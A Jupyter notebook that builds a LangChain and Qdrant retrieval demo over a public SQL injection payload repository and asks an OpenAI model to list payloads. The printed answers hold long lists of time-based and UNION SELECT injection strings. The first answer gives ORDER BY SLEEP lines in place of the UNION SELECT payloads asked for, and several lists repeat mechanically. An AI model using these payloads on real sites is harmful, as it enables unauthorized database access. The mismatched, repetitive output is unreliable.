In [1]:
import warnings
warnings.filterwarnings('ignore')

import os

from dotenv import load_dotenv, find_dotenv
_ = load_dotenv(find_dotenv()) # read local .env file

In [2]:
import os
import random
import re
import wandb
from rich.markdown import Markdown

from langchain.chat_models import ChatOpenAI
from langchain.document_loaders import GitLoader
from langchain.text_splitter import MarkdownTextSplitter
from langchain.embeddings import OpenAIEmbeddings
from langchain.vectorstores import Qdrant
from langchain.prompts import PromptTemplate

In [4]:
loader = GitLoader(
    clone_url="https://github.com/payloadbox/sql-injection-payload-list",
    repo_path="./github_data/sql_repo/",
    branch="master",
    file_filter=lambda file_path: file_path.endswith(".md")
)

data = loader.load()

In [5]:
data[0].page_content

'### SQL Injection Payload List\r\n\r\n<p align="center">\r\n  <img src="https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg"> <img src="https://img.shields.io/github/stars/payloadbox/sql-injection-payload-list?style=social"> <img src="https://img.shields.io/github/forks/payloadbox/sql-injection-payload-list?style=social"> <img src="https://img.shields.io/github/repo-size/payloadbox/sql-injection-payload-list"> <img src="https://img.shields.io/github/license/payloadbox/sql-injection-payload-list"> <img src="https://img.shields.io/github/issues/detail/author/payloadbox/command-injection-payload-list/1">\r\n</p>\r\n\r\n#### SQL Injection\r\n\r\nIn this section, we\'ll explain what SQL injection is, describe some common examples, explain how to find and exploit various kinds of SQL injection vulnerabilities, and summarize how to prevent SQL injection. \r\n\r\n#### What is SQL injection (SQLi)?\r\n\r\nSQL injection is a web security vulnerab

In [6]:
def remove_html_tags(text):
    clean = re.compile('<.*?>')
    return re.sub(clean, '', text)

data[0].page_content = remove_html_tags(data[0].page_content)

In [13]:
# we need a single line of code to start tracing langchain with W&B
os.environ["LANGCHAIN_WANDB_TRACING"] = "true"

# here we are configuring the wandb project name
os.environ["WANDB_PROJECT"] = "sql-injection-tools"

## Parsing

In [8]:
md_text_splitter = MarkdownTextSplitter(chunk_size=4000, chunk_overlap=500)
document_sections = md_text_splitter.split_documents(data)
len(document_sections)

18

In [9]:
Markdown(document_sections[2].page_content)

|Out-of-band SQLi|Out-of-band SQL Injection is not very common, mostly because it depends on features being enabled
on the database server being used by the web application. Out-of-band SQL Injection occurs when an attacker is     
unable to use the same channel to launch the attack and gather results. Out-of-band techniques, offer an attacker  
an alternative to inferential time-based techniques, especially if the server responses are not very stable (making
an inferential time-based attack unreliable).| | Voice Based Sql Injection | It is a sql injection attack method   
that can be applied in applications that provide access to databases with voice command. An attacker could pull    
information from the database by sending sql queries with sound. |

## Embeddings

In [10]:
# We will use the OpenAIEmbeddings to embed the text, and Qdrant to store the vectors
embeddings = OpenAIEmbeddings()
db = Qdrant.from_documents(document_sections, 
                           embeddings,
                           path="/tmp/local_qdrant_db",
                           collectio_name="sql_injection_tools")

In [11]:
db_retriever = db.as_retriever()
db_retriever

VectorStoreRetriever(vectorstore=<langchain.vectorstores.qdrant.Qdrant object at 0x000001CB45F2B090>, search_type='similarity', search_kwargs={})

In [16]:
query = "List some Generic Union Select Payloads"
docs = db_retriever.get_relevant_documents(query)

Error in WandbTracer.on_retriever_start callback: retriever
Error in WandbTracer.on_retriever_end callback: No retriever Run found to be traced


In [17]:
prompt_template = """
Use the following context to answer the question at the end.
If you don't know the answer, just say that you don't know, try not to make up an answer.

{context}

Question: {question}
Answer:
"""

PROMPT = PromptTemplate(template=prompt_template, input_variables=["context", "question"])

context = docs[0].page_content
prompt = PROMPT.format(context=context, question=query)

In [19]:
llm = ChatOpenAI(temperature=0.0)
response = llm.predict(prompt)
Markdown(response)

Some Generic Union Select Payloads are:                                                                            

 • ORDER BY SLEEP(5)                                                                                               
 • ORDER BY 1,SLEEP(5)                                                                                             
 • ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A'))                                                                 
 • ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4                                                               
 • ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5                                                             
 • ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6                                                           
 • ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7                                                         
 • ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8                                                       
 • ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9                                                     
 • ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10                                                  
 • ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11                                               
 • ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12                                            
 • ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13                                         
 • ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14                                      
 • ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15                                   
 • ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16                                
 • ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17                             
 • ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18                          
 • ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19                       
 • ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20                    
 • ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21                 
 • ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22              
 • ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23           
 • ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24        
 • ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25     
 • ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26  
 • ORDER BY                                                                                                        
   1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27        
 • ORDER BY                                                                                                        
   1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28     
 • ORDER BY                                                                                                        
   1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29  
 • ORDER BY                                                                                                        
   1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,1

In [20]:
query = "List some Generic UNION SELECT Payloads"
docs = db_retriever.get_relevant_documents(query)
context = docs[0].page_content
prompt = PROMPT.format(context=context, question=query)

response = llm.predict(prompt)
Markdown(response)

Error in WandbTracer.on_retriever_start callback: retriever
Error in WandbTracer.on_retriever_end callback: No retriever Run found to be traced


Some generic UNION SELECT payloads include:                                                                        

 • UNION SELECT NULL                                                                                               
 • UNION SELECT 'a', 'b', 'c'                                                                                      
 • UNION SELECT 1,2,3                                                                                              
 • UNION SELECT 'a',2,3                                                                                            
 • UNION SELECT 'a',2,3 FROM dual                                                                                  
 • UNION SELECT 'a',2,3 FROM dual WHERE 1=1                                                                        
 • UNION SELECT 'a',2,3 FROM dual WHERE 1=0                                                                        
 • UNION SELECT 'a',2,3 FROM dual WHERE 1=1 ORDER BY 1                                                             
 • UNION SELECT 'a',2,3 FROM dual WHERE 1=1 ORDER BY 2                                                             
 • UNION SELECT 'a',2,3 FROM dual WHERE 1=1 ORDER BY 3                                                             
 • UNION SELECT 'a',2,3 FROM dual WHERE 1=1 ORDER BY 4                                                             
 • UNION SELECT 'a',2,3 FROM dual WHERE 1=1 ORDER BY 5                                                             
 • UNION SELECT 'a',2,3 FROM dual WHERE 1=1 ORDER BY 6                                                             
 • UNION SELECT 'a',2,3 FROM dual WHERE 1=1 ORDER BY 7                                                             
 • UNION SELECT 'a',2,3 FROM dual WHERE 1=1 ORDER BY 8                                                             
 • UNION SELECT 'a',2,3 FROM dual WHERE 1=1 ORDER BY 9                                                             
 • UNION SELECT 'a',2,3 FROM dual WHERE 1=1 ORDER BY 10                                                            
 • UNION SELECT 'a',2,3 FROM dual WHERE 1=1 ORDER BY 11                                                            
 • UNION SELECT 'a',2,3 FROM dual WHERE 1=1 ORDER BY 12                                                            
 • UNION SELECT 'a',2,3 FROM dual WHERE 1=1 ORDER BY 13                                                            
 • UNION SELECT 'a',2,3 FROM dual WHERE 1=1 ORDER BY 14                                                            
 • UNION SELECT 'a',2,3 FROM dual WHERE 1=1 ORDER BY 15                                                            
 • UNION SELECT 'a',2,3 FROM dual WHERE 1=1 ORDER BY 16                                                            
 • UNION SELECT 'a',2,3 FROM dual WHERE 1=1 ORDER BY 17                                                            
 • UNION SELECT 'a',2,3 FROM dual WHERE 1=1 ORDER BY 18                                                            
 • UNION SELECT 'a',2,3 FROM dual WHERE 1=1 ORDER BY 19                                                            
 • UNION SELECT 'a',2,3 FROM dual WHERE 1=1 ORDER BY 20                                                            
 • UNION SELECT 'a',2,3 FROM dual WHERE 1=1 ORDER BY 21                                                            
 • UNION SELECT 'a',2,3 FROM dual WHERE 1=1 ORDER BY 22                                                            
 • UNION SELECT 'a',2,3 FROM dual WHERE 1=1 ORDER BY 23                                                            
 • UNION SELECT 'a',2,3 FROM dual WHERE 1=1 ORDER BY 24                                                            
 • UNION SELECT 'a',2,3 FROM dual WHERE 1=1 ORDER BY 25                                                            
 • UNION SELECT 'a',2,3 FROM dual WHERE 1=1 ORDER BY 26                                                            
 • UNION SELECT 'a',2,3 FROM dual WHERE 1=1 ORDER BY 27

In [21]:
query = "List some Generic Time Based SQL Injection Payloads"
docs = db_retriever.get_relevant_documents(query)
context = docs[0].page_content
prompt = PROMPT.format(context=context, question=query)

response = llm.predict(prompt)
Markdown(response)

Error in WandbTracer.on_retriever_start callback: retriever
Error in WandbTracer.on_retriever_end callback: No retriever Run found to be traced


 • sleep(5)#                                                                                                       
 • 1 or sleep(5)#                                                                                                  
 • " or sleep(5)#                                                                                                  
 • ' or sleep(5)#                                                                                                  
 • " or sleep(5)="                                                                                                 
 • ' or sleep(5)='                                                                                                 
 •  1 or sleep(5)#                                                                                                 
 • ") or sleep(5)="                                                                                                
 • ') or sleep(5)='                                                                                                
 • 1)) or sleep(5)#                                                                                                
 • ")) or sleep(5)="                                                                                               
 • ')) or sleep(5)='                                                                                               
 • ;waitfor delay '0:0:5'--                                                                                        
 • );waitfor delay '0:0:5'--                                                                                       
 • ';waitfor delay '0:0:5'--                                                                                       
 • ";waitfor delay '0:0:5'--                                                                                       
 • ');waitfor delay '0:0:5'--                                                                                      
 • ");waitfor delay '0:0:5'--                                                                                      
 • ));waitfor delay '0:0:5'--                                                                                      
 • '));waitfor delay '0:0:5'--                                                                                     
 • "));waitfor delay '0:0:5'--                                                                                     
 • benchmark(10000000,MD5(1))#                                                                                     
 • 1 or benchmark(10000000,MD5(1))#                                                                                
 • " or benchmark(10000000,MD5(1))#                                                                                
 • ' or benchmark(10000000,MD5(1))#                                                                                
 •  1 or benchmark(10000000,MD5(1))#                                                                               
 • ") or benchmark(10000000,MD5(1))#                                                                               
 • ') or benchmark(10000000,MD5(1))#                                                                               
 • 1)) or benchmark(10000000,MD5(1))#                                                                              
 • ")) or benchmark(10000000,MD5(1))#                                                                              
 • ')) or benchmark(10000000,MD5(1))#                                                                              
 • pg_sleep(5)--                                                                                                   
 • 1 or pg_sleep(5)--                                                                                              
 • " or pg_sleep(5)--                                                                                              
 • ' or pg_sleep(5)--                                   